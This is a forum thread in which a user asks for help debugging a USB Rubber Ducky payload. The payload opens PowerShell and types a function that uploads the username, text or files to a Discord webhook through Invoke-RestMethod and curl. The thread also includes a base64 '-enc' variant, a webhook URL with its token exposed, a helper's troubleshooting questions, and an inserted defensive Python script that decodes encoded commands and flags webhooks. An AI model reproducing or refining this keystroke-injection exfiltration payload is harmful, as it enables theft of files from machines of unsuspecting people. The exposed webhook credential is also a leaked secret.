Jason Boreno (Posted January 10)

So I'm looking for guidance here. In my PowerShell script I use a function, it exports a file/text to a Discord webhook. When pasted into PowerShell, the function works fine. But when I convert it to a ducky script I get some errors that I didn't get before. Here's the weird thing, when I encode the ducky script with base64, there's no spaces or formatting and it works fine. So I would assume it's some type of formatting in my ducky script that is causing the error. When it's encoded, I cannot reference other variables from outside the function so I need it to work in plain text. Anything helps.

PS Script:

    function Upload-Discord {

    [CmdletBinding()]
    param (
        [parameter(Position=0,Mandatory=$False)]
        [string]$file,
        [parameter(Position=1,Mandatory=$False)]
        [string]$text
    )

    $hookurl = 'my discord webhook'

    $Body = @{
      'username' = $env:username
      'content' = $text
    }

    if (-not ([string]::IsNullOrEmpty($text))){
    Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};

    if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
    }

Converted to ducky:

    DELAY 2000
    GUI r
    DELAY 2000
    STRING powershell
    DELAY 250
    ENTER
    DELAY 2000
    STRING function Upload-Discord {
    STRING
    STRING [CmdletBinding()]
    STRING param (
    STRING [parameter(Position=0,Mandatory=$False)]
    STRING [string]$file,
    STRING [parameter(Position=1,Mandatory=$False)]
    STRING [string]$text
    STRING )
    STRING
    STRING $hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'
    STRING
    STRING $Body = @{
    STRING 'username' = $env:username
    STRING 'content' = $text
    STRING }
    STRING
    STRING if (-not ([string]::IsNullOrEmpty($text))){
    STRING Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};
    STRING
    STRING if (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}
    STRING }
    STRING

Converted to ducky (Encoded) works fine for some reason?:

    DELAY 2000
    GUI r
    DELAY 2000
    STRING powershell
    DELAY 250
    ENTER
    DELAY 250
    STRING powershell -enc '
    DELAY 250
    STRING [base64-encoded PowerShell omitted]'
    ENTER

PS Errors:

    PS C:\WINDOWS\system32> function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandatory=$False)]`n[string]$text `n)`n`n$hookurl = 'https://discord.com/api/webhooks/1194215544342196275/dgFll7XP-mLSiNWHxUoFkSpuKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'username' = $env:username`n'content' = $text`n}`n`nif (-not ([string]::IsNullOrEmpty($text))){`nInvoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl -Method Post -Body ($Body | ConvertTo-Json)};`n`nif (-not ([string]::IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING
    At line:1 char:45
    + function Upload-Discord {`n`n[CmdletBinding()]`nparam (`n[parameter(P ...
    + ~
    An expression was expected after '('.
    At line:1 char:79
    + ... scord {`n`n[CmdletBinding()]`nparam (`n[parameter(Position=0,Mandator ...
    + ~
    Missing argument in parameter list.
    At line:1 char:137
    + ... =0,Mandatory=$False)]`n[string]$file,`n[parameter(Position=1,Mandator ...
    + ~
    Missing argument in parameter list.
    At line:1 char:327
    + ... puKT62Uf5GN-_IlcuB4VknzWky9UwAlPoQRezxzLoIWRJI'`n`n$Body = @{`n'usern ...
    + ~
    The hash literal was incomplete.
    At line:1 char:621
    + ... IsNullOrEmpty($file))){curl.exe -F "file1=@$file" $hookurl}`n}`nTRING
    + ~
    Unexpected token '}' in expression or statement.
    + CategoryInfo : ParserError: (:) [], ParentContainsErrorRecordException
    + FullyQualifiedErrorId : ExpectedExpression

    PS C:\WINDOWS\system32> Upload-Discord -file "$dir\output.txt"
    Upload-Discord : The term 'Upload-Discord' is not recognized as the name of a cmdlet, function, script file, or operable program.
    Check the spelling of the name, or if a path was included, verify that the path is correct and try again.
    At line:1 char:1
    + Upload-Discord -file "$dir\output.txt"
    + ~~~~~~~~~~~~~~
    + CategoryInfo : ObjectNotFound: (Upload-Discord:String) [], CommandNotFoundException
    + FullyQualifiedErrorId : CommandNotFoundException

PS PIC: https://ibb.co/tXpxLmc

dark_pyrro (Posted January 10)

4 hours ago, Jason Boreno said:
> when I encode the ducky script with base64

Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script.

What are you using to encode the Ducky script itself into an inject.bin?

Are you using a language when encoding that corresponds with the target keyboard language (if not US)?

BTW, both your screenshot and the included base64 code is exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it.
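
The point above about the base64 code exposing the webhook holds for any `powershell -enc` argument: it is only base64 over UTF-16LE text, so a defender can decode it and flag the webhook during triage. The following is an added example, not code from any post in this thread; the function names, the placeholder webhook and the sample lines are constructed for illustration.

```python
import base64
import binascii
import re

WEBHOOK_RE = re.compile(
    r"https://(?:[a-z]+\.)?discord(?:app)?\.com/api/webhooks/(\d+)/([\w-]+)", re.I)
ENC_ARG_RE = re.compile(r"-(e[a-z]*)\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?", re.I)

def is_encoded_flag(flag):
    """PowerShell accepts any prefix of -EncodedCommand, plus the -ec alias."""
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)

def decode_enc(cmdline):
    """Return the script hidden in a `powershell -enc <b64>` line, or None."""
    for flag, blob in ENC_ARG_RE.findall(cmdline):
        if not is_encoded_flag(flag):
            continue
        try:
            raw = base64.b64decode(blob, validate=True)
            return raw.decode("utf-16-le")  # -enc expects UTF-16LE text
        except (binascii.Error, UnicodeDecodeError):
            continue
    return None

def triage(lines):
    """Flag lines that reference a Discord webhook, in clear or under -enc."""
    findings = []
    for n, line in enumerate(lines, 1):
        decoded = decode_enc(line)
        for text, how in ((line, "plain"), (decoded or "", "decoded -enc")):
            for m in WEBHOOK_RE.finditer(text):
                # Keep the webhook id for correlation; never log the token.
                findings.append((n, how, f"webhook id {m.group(1)}, token redacted"))
    return findings

# Constructed sample input (placeholder webhook, not taken from the thread).
HOOK = "https://discord.com/api/webhooks/000000000000000000/CONSTRUCTED-token_0"
SCRIPT = f"$hookurl = '{HOOK}'; curl.exe -F \"file1=@out.txt\" $hookurl"
B64 = base64.b64encode(SCRIPT.encode("utf-16-le")).decode()
SAMPLE = [
    f"powershell -enc '{B64}'",
    SCRIPT,
    "powershell -ExecutionPolicy Bypass -File backup.ps1",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE):
        print(finding)
```
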

Jason Boreno (Author, Posted January 11)

20 hours ago, dark_pyrro said:
> Just to be sure; as I see it, it's not the Ducky script that is encoded with base64, it's the PowerShell code/script.
>
> What are you using to encode the Ducky script itself into an inject.bin?
>
> Are you using a language when encoding that corresponds with the target keyboard language (if not US)?
>
> BTW, both your screenshot and the included base64 code is exposing a Discord webhook. If it's your webhook then that should perhaps be removed if you don't want to share it.

I used Jakoby's PowerShell-to-ducky-converter to convert PowerShell functions to ducky, I've only seen it use the US keyboard (Target keyboard). This converter has the option for encoding, which I tried out, and did have success running it, though I'm unsure if the version I posted worked... But I did have success with it before. Here's the git for the converter if you are curious. ( https://github.com/I-Am-Jakoby/Powershell-to-Ducky-Converter )

The main question I have though is, what exactly is throwing the error in the plain text ducky? Like I said before it works fine when pasted into PowerShell, but for some reason when the ducky script is typing it out, the formatting is off when compared to the PowerShell script and it never seems to work.

Also, if I knew how to edit posts, I would take the Discord hook out... I was clearly not paying attention very well and was excited to find an active forum on the matter. I can always make a new one though!

dark_pyrro (Posted January 11)

OK, I understand

2 hours ago, Jason Boreno said:
> I used Jakoby's PowerShell-to-ducky-converter to convert PowerShell functions to ducky

That, however, doesn't convert anything to DuckyScript as I see it. So my question remains; what tool are you using to encode the DuckyScript code to an inject.bin file that the Ducky can execute?

2 hours ago, Jason Boreno said:
> I've only seen it use the US keyboard (Target keyboard)

That doesn't really answer my question about if the keyboard language used when encoding the DuckyScript payload is corresponding to the keyboard language used by the intended target. So, is the target Windows computer using a US keyboard layout?

2 hours ago, Jason Boreno said:
> what exactly is throwing the error in the plain text ducky?

From what I can tell by looking at the output posted, it seems as if line feeds aren't handled correctly. That's why I'm asking about keyboard layouts. It doesn't really look like that might be the issue, but I have to ask to rule that out of it all.

And my last question; are you using a true/original/official Hak5 USB Rubber Ducky (first generation) when doing all of this?